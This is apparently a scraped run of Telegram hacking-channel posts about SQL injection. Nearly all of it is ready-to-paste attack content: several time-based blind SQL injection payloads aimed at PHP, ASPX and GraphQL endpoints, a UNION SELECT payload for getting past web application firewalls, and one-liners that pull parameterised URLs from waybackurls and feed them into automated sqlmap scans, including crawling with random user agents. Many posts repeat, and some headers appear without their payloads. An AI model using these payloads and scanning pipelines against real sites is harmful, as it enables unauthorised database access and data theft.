آموزش Blind Sql injection در محیط Dvwa
#sql_injection #sql #dvwa
iliyahr
——————
0Day.Today
@LearnExploit
@Tech_Army
#sql_injection #sql #dvwa
iliyahr
——————
0Day.Today
@LearnExploit
@Tech_Army
Time sleep sql injection ⚡️
Payload:
#sql #sql_injection #payload
——————
0Day.Today
@LearnExploit
@Tech_Army
Payload:
'XOR(if(now()=sysdate(),sleep(33),0))OR'
#sql #sql_injection #payload
——————
0Day.Today
@LearnExploit
@Tech_Army
sql injection payload
#sql #sql_injection
——————
0Day.Today
@LearnExploit
@Tech_Army
14)%20AND%20(SELECT%207415%20FROM%20(SELECT(SLEEP(10)))CwkU)%20AND%20(7515=7515
#sql #sql_injection
——————
0Day.Today
@LearnExploit
@Tech_Army
SQL Injection
#sql_injection
——————
0Day.Today
@LearnExploit
@Tech_Army
GET
/0"XOR(if(now()=sysdate(),sleep(6),0))XOR"Z/Folder/
HTTP/1.1
#sql_injection
——————
0Day.Today
@LearnExploit
@Tech_Army
Sql Injection Payload
Payload :
#Payload #sql_injection
——————
0Day.Today
@LearnExploit
@Tech_Army
Payload :
0'XOR(if(now()=sysdate(),sleep(3),0))XOR'Z
#Payload #sql_injection
——————
0Day.Today
@LearnExploit
@Tech_Army
Blind SQL Injection payload
#Sql #sql_injection #Payload
——————
0Day.Today
@LearnExploit
@Tech_Army
if(now()=sysdate()%2Csleep(10)%2C0)
#Sql #sql_injection #Payload
——————
0Day.Today
@LearnExploit
@Tech_Army
7 SQLs
4 in php
1 in aspx
2 in graphql
#SQL #sql_injection
——————
0Day.Today
@LearnExploit
@Tech_Army
4 in php
(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/
1 in aspx
orwa';%20waitfor%20delay%20'0:0:6'%20--%20
2 in graphql
orwa') OR 11=(SELECT 11 FROM PG_SLEEP(6))--
#SQL #sql_injection
——————
0Day.Today
@LearnExploit
@Tech_Army
SQLMap from Waybackurls ⚡️
waybackurls target | grep -E '\bhttps?://\S+?=\S+' | grep -E '\.php|\.asp' | sort -u | sed 's/\(=[^&]*\)/=/g' | tee urls.txt | sort -u -o urls.txt && cat urls.txt | xargs -I{} sqlmap --technique=T --batch -u "{}"
#sql #sql_injection #tip
——————
0Day.Today
@LearnExploit
@Tech_Army
waybackurls target | grep -E '\bhttps?://\S+?=\S+' | grep -E '\.php|\.asp' | sort -u | sed 's/\(=[^&]*\)/=/g' | tee urls.txt | sort -u -o urls.txt && cat urls.txt | xargs -I{} sqlmap --technique=T --batch -u "{}"
#sql #sql_injection #tip
——————
0Day.Today
@LearnExploit
@Tech_Army
Do you know that sqlmap has its own crawler? Run in the background easily:
sqlmap -u 'https://target\.com' --crawl=3 --random-agent --batch --forms --threads=5 --hostname --timeout=15 --retries=1 --time-sec 12
#sql #sql_injection
——————
0Day.Today
@LearnExploit
@Tech_Army
sqlmap -u 'https://target\.com' --crawl=3 --random-agent --batch --forms --threads=5 --hostname --timeout=15 --retries=1 --time-sec 12
#sql #sql_injection
——————
0Day.Today
@LearnExploit
@Tech_Army
Sql Injection
Payload :
Parameter:
#BugBounty #Tips #sql_injection
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
Payload :
-10'XOR(if(now()=sysdate(),sleep(20),0))XOR'Z
Parameter:
cart/-10+payload
#BugBounty #Tips #sql_injection
Please open Telegram to view this post
VIEW IN TELEGRAM
Sql injection Manual Bypass WAF
Payload :
'AND+0+/*!50000UNION*/+/*!50000SELECT*/+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--+-
#sql_injection #Bypass #WAF
——————
0Day.Today
@LearnExploit
@Tech_Army
Payload :
'AND+0+/*!50000UNION*/+/*!50000SELECT*/+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--+-
#sql_injection #Bypass #WAF
——————
0Day.Today
@LearnExploit
@Tech_Army
Time based SQL Injection using waybackurls
waybackurls TARGET.COM | grep -E '\bhttps?://\S+?=\S+' | grep -E '\.php|\.asp' | sort -u | sed 's/\(=[^&]*\)/=/g' | tee urls.txt | sort -u -o urls.txt
#sql_injection #sql #tip
——————
0Day.Today
@LearnExploit
@Tech_Army
waybackurls TARGET.COM | grep -E '\bhttps?://\S+?=\S+' | grep -E '\.php|\.asp' | sort -u | sed 's/\(=[^&]*\)/=/g' | tee urls.txt | sort -u -o urls.txt
#sql_injection #sql #tip
——————
0Day.Today
@LearnExploit
@Tech_Army